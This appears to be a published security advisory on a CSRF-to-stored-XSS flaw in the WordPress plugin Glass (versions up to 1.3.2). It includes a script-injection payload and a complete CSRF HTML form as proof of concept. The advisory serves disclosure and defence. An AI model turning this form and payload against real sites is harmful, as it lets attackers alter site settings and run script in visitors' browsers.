WordPress Plugin Vulnerabilities
Glass <= 1.3.2 - CSRF to Stored Cross-Site Scripting (XSS)
Description
The plugin does not sanitise or escape its "Glass Pages" setting before outputting in a page, leading to a Stored Cross-Site Scripting issue. Furthermore, the plugin did not have CSRF check in place when saving its settings, allowing the issue to be exploited via a CSRF attack.
Proof of Concept
Add the following payload in the "Glass Pages" setting (/wp-admin/options-general.php?page=glass%2Fglass.php): '><script>alert(/XSS/)</script>
Via CSRF:
<html>
<body>
<form action="https://example.com/wp-admin/options-general.php?page=glass/glass.php" method="POST">
<input type="hidden" name="myrtheGlassDefaultSize" value="4" />
<input type="hidden" name="myrtheGlassRimPath" value="" />
<input type="hidden" name="myrtheGlassRimRGB" value="CC6633" />
<input type="hidden" name="myrtheGlassBackgroundRGB" value="999999" />
<input type="hidden" name="myrtheGlassMinEnlarge" value="2.0" />
<input type="hidden" name="myrtheGlassMaxEnlarge" value="100.0" />
<input type="hidden" name="myrtheGlassDx" value="0" />
<input type="hidden" name="myrtheGlassDy" value="0" />
<input type="hidden" name="myrtheGlassOnFrontPage" value="y" />
<input type="hidden" name="myrtheGlassCategories" value="" />
<input type="hidden" name="myrtheGlassPages" value="'><script>alert(/XSS/)</script>" />
<input type="hidden" name="myrtheGlassExcludePlatforms" value="iPod" />
<input type="hidden" name="update_MyrtheGlassSettings" value="Update Settings" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Affects Plugins
No known fix - plugin closed
References
Classification
Miscellaneous
Original Researcher
ABISHEIK M
Submitter
ABISHEIK M
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2021-06-21 (about 2 years ago)
Added
2021-06-21 (about 2 years ago)
Last Updated
2021-06-25 (about 2 years ago)